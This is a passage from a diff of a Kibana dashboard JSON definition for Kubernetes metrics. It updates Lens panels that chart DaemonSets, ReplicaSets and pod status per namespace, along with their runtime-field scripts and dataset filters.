"query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_replicaset" - } - } - } - ], - "internalReferences": [ - { - "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", - "name": 
"indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a51a9822-167b-4b8f-b7a6-3051da30164b", - "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "fcc76997-5b49-416b-81ba-37d65ea25296", - "xAccessor": "446fc0b3-a6c8-4f4d-914b-748d488083a1", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" - }, - { - "color": "#00bfb3", - "forAccessor": "a51a9822-167b-4b8f-b7a6-3051da30164b" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "e36fb66d-f9b0-46d3-aec4-52638d34d308": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "0e2a3f8d-cc26-453d-bed1-b184e48756b2", + "type": "column" + }, + 
"orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "295ecdc5-f413-4f20-9f77-74927a10d33d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", - "w": 10, - "x": 38, - "y": 13 - }, - "panelIndex": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", - "title": "ReplicaSets", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [ + { + "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "0e2a3f8d-cc26-453d-bed1-b184e48756b2", + "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "e36fb66d-f9b0-46d3-aec4-52638d34d308", + "xAccessor": "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" + }, + { + "color": "#00bfb3", + "forAccessor": "0e2a3f8d-cc26-453d-bed1-b184e48756b2" + } + ] + } + ], + "legend": { + "isVisible": false, 
+ "position": "bottom", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c81359c-376d-41bd-984d-60fb106f2e33", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2ca9773d-0221-478b-b8bc-90bb8d439f33": { - "columnOrder": [ - "76e50af3-9df6-42c7-9b0e-eea21ab3650f", - "1a2ebd5d-82b1-4cf8-a934-152a5726a82f", - "0f308b41-fbc2-41aa-beef-ba6412224944" - ], - "columns": { - "0f308b41-fbc2-41aa-beef-ba6412224944": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.phase : \"running\" " - }, - "isBucketed": false, - "label": "Unique count of kubernetes.pod.name", - "operationType": "unique_count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.name" - }, - "1a2ebd5d-82b1-4cf8-a934-152a5726a82f": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Pods per Namespace" - } - ] - }, - "scale": "ordinal" - }, - "76e50af3-9df6-42c7-9b0e-eea21ab3650f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.namespace", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "0f308b41-fbc2-41aa-beef-ba6412224944", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - 
"size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.namespace" - } - }, - "incompleteColumns": {} - } - } - } - }, + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "DaemonSets" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", + "w": 10, + "x": 38, + "y": 13 + }, + "panelIndex": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "dbfaeb6f-4fff-4043-8bf8-19d5345fd339": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", + "name": "state_replicaset_ad-hoc", + 
"runtimeFieldMap": { + "not_ready": { + "script": { + "source": "def ready = doc['kubernetes.replicaset.replicas.ready'].value;\ndef des = doc['kubernetes.replicaset.replicas.desired'].value;\nemit(des-ready)" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "fcc76997-5b49-416b-81ba-37d65ea25296", + "446fc0b3-a6c8-4f4d-914b-748d488083a1", + "a51a9822-167b-4b8f-b7a6-3051da30164b", + "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" + ], + "columns": { + "446fc0b3-a6c8-4f4d-914b-748d488083a1": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "5c81359c-376d-41bd-984d-60fb106f2e33", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "0f308b41-fbc2-41aa-beef-ba6412224944" - ], - "layerId": "2ca9773d-0221-478b-b8bc-90bb8d439f33", - "layerType": "data", - "palette": { - "name": "status", - "type": "palette" - }, - 
"position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "76e50af3-9df6-42c7-9b0e-eea21ab3650f", - "xAccessor": "1a2ebd5d-82b1-4cf8-a934-152a5726a82f" - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "a51a9822-167b-4b8f-b7a6-3051da30164b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.replicaset.replicas.ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "kubernetes.replicaset.replicas.ready" + }, + "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "not_ready" + }, + "fcc76997-5b49-416b-81ba-37d65ea25296": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.replicaset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a51a9822-167b-4b8f-b7a6-3051da30164b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + 
"sourceField": "kubernetes.replicaset.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_replicaset" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", - "w": 9, - "x": 0, - "y": 13 - }, - "panelIndex": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", - "title": "Running pods per namespace", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_replicaset" + } + } + } + ], + "internalReferences": [ + { + "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "a51a9822-167b-4b8f-b7a6-3051da30164b", + "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "fcc76997-5b49-416b-81ba-37d65ea25296", + "xAccessor": "446fc0b3-a6c8-4f4d-914b-748d488083a1", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" + }, + { + "color": "#00bfb3", + "forAccessor": "a51a9822-167b-4b8f-b7a6-3051da30164b" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": 
"bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "ReplicaSets" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", + "w": 9, + "x": 0, + "y": 13 + }, + "panelIndex": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c81359c-376d-41bd-984d-60fb106f2e33", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ca9773d-0221-478b-b8bc-90bb8d439f33": { + "columnOrder": [ + "76e50af3-9df6-42c7-9b0e-eea21ab3650f", + "1a2ebd5d-82b1-4cf8-a934-152a5726a82f", + "0f308b41-fbc2-41aa-beef-ba6412224944" + ], + "columns": { + "0f308b41-fbc2-41aa-beef-ba6412224944": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.phase : \"running\" " + }, + "isBucketed": false, + "label": "Unique count of kubernetes.pod.name", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.name" + }, + "1a2ebd5d-82b1-4cf8-a934-152a5726a82f": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Pods per Namespace" + } + ] + }, + "scale": "ordinal" + }, + "76e50af3-9df6-42c7-9b0e-eea21ab3650f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.namespace", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "0f308b41-fbc2-41aa-beef-ba6412224944", + "type": "column" }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "3d69345e-fb52-485a-8762-fdfaf09ea013", - "1699b42c-8ab5-43dc-a722-6d70911eae94", - "1c9e34cf-591d-4a4f-9999-67e95918e933", - "92280dfe-0252-4993-9c5d-28764c18bc13", - "1df45e80-f287-4f85-9f8e-6efaddff0f77", - "866856c3-c189-4457-9240-ab6a9d2df75d" - ], - "columns": { - "1699b42c-8ab5-43dc-a722-6d70911eae94": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - 
"operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "*" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "1c9e34cf-591d-4a4f-9999-67e95918e933": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "running: *" - }, - "isBucketed": false, - "label": "Running", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "running" - }, - "1df45e80-f287-4f85-9f8e-6efaddff0f77": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "pending: *" - }, - "isBucketed": false, - "label": "Pending", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "pending" - }, - "3d69345e-fb52-485a-8762-fdfaf09ea013": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "1df45e80-f287-4f85-9f8e-6efaddff0f77", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - }, - "866856c3-c189-4457-9240-ab6a9d2df75d": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "failed: *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "failed" - }, - "92280dfe-0252-4993-9c5d-28764c18bc13": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": 
"succeeded: *" - }, - "isBucketed": false, - "label": "Succeeded", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "succeeded" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "kubernetes.namespace" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "5c81359c-376d-41bd-984d-60fb106f2e33", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_pod" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "0f308b41-fbc2-41aa-beef-ba6412224944" + ], + "layerId": "2ca9773d-0221-478b-b8bc-90bb8d439f33", + "layerType": "data", + "palette": { + "name": "status", + "type": "palette" + }, + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "76e50af3-9df6-42c7-9b0e-eea21ab3650f", + "xAccessor": "1a2ebd5d-82b1-4cf8-a934-152a5726a82f" + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + 
"hidePanelTitles": false, + "type": "lens" + }, + "title": "Running pods per namespace" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", + "w": 9, + "x": 9, + "y": 13 + }, + "panelIndex": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "3d69345e-fb52-485a-8762-fdfaf09ea013", + "1699b42c-8ab5-43dc-a722-6d70911eae94", + "1c9e34cf-591d-4a4f-9999-67e95918e933", + "92280dfe-0252-4993-9c5d-28764c18bc13", + "1df45e80-f287-4f85-9f8e-6efaddff0f77", + "866856c3-c189-4457-9240-ab6a9d2df75d" + ], + "columns": { + "1699b42c-8ab5-43dc-a722-6d70911eae94": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + 
"operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0fa53a1e-0589-4380-b700-70dd489a33de", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_pod" - } - } - } - ], - "internalReferences": [ - { - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" + { + "input": { + "language": "kuery", + "query": "*" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" + }, + "1c9e34cf-591d-4a4f-9999-67e95918e933": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "running: *" + }, + "isBucketed": false, + "label": "Running", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "running" + }, + "1df45e80-f287-4f85-9f8e-6efaddff0f77": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "pending: *" + }, + "isBucketed": false, + "label": "Pending", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "pending" + }, + "3d69345e-fb52-485a-8762-fdfaf09ea013": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1df45e80-f287-4f85-9f8e-6efaddff0f77", + "type": "column" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": 
false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "1c9e34cf-591d-4a4f-9999-67e95918e933", - "92280dfe-0252-4993-9c5d-28764c18bc13", - "1df45e80-f287-4f85-9f8e-6efaddff0f77", - "866856c3-c189-4457-9240-ab6a9d2df75d" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "3d69345e-fb52-485a-8762-fdfaf09ea013", - "xAccessor": "1699b42c-8ab5-43dc-a722-6d70911eae94", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "866856c3-c189-4457-9240-ab6a9d2df75d" - }, - { - "color": "#fec514", - "forAccessor": "1df45e80-f287-4f85-9f8e-6efaddff0f77" - }, - { - "color": "#00bfb3", - "forAccessor": "1c9e34cf-591d-4a4f-9999-67e95918e933" - }, - { - "color": "#0077cc", - "forAccessor": "92280dfe-0252-4993-9c5d-28764c18bc13" - } - ] - } - ], - "legend": { - "horizontalAlignment": "right", - "isInside": false, - "isVisible": false, - "maxLines": 1, - "position": "bottom", - "shouldTruncate": true, - "showSingleSeries": false, - "verticalAlignment": "bottom" - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "866856c3-c189-4457-9240-ab6a9d2df75d": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "failed: *" + }, + 
"isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "failed" + }, + "92280dfe-0252-4993-9c5d-28764c18bc13": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "succeeded: *" + }, + "isBucketed": false, + "label": "Succeeded", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "succeeded" } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0fa53a1e-0589-4380-b700-70dd489a33de", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_pod" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", - "w": 9, - "x": 9, - "y": 13 - }, - "panelIndex": "91e43cd8-5259-43a8-b9d7-a098875ae5b3", - "title": "Pods", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_pod" + } + } + } + ], + "internalReferences": [ + { + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "1c9e34cf-591d-4a4f-9999-67e95918e933", + "92280dfe-0252-4993-9c5d-28764c18bc13", + "1df45e80-f287-4f85-9f8e-6efaddff0f77", + 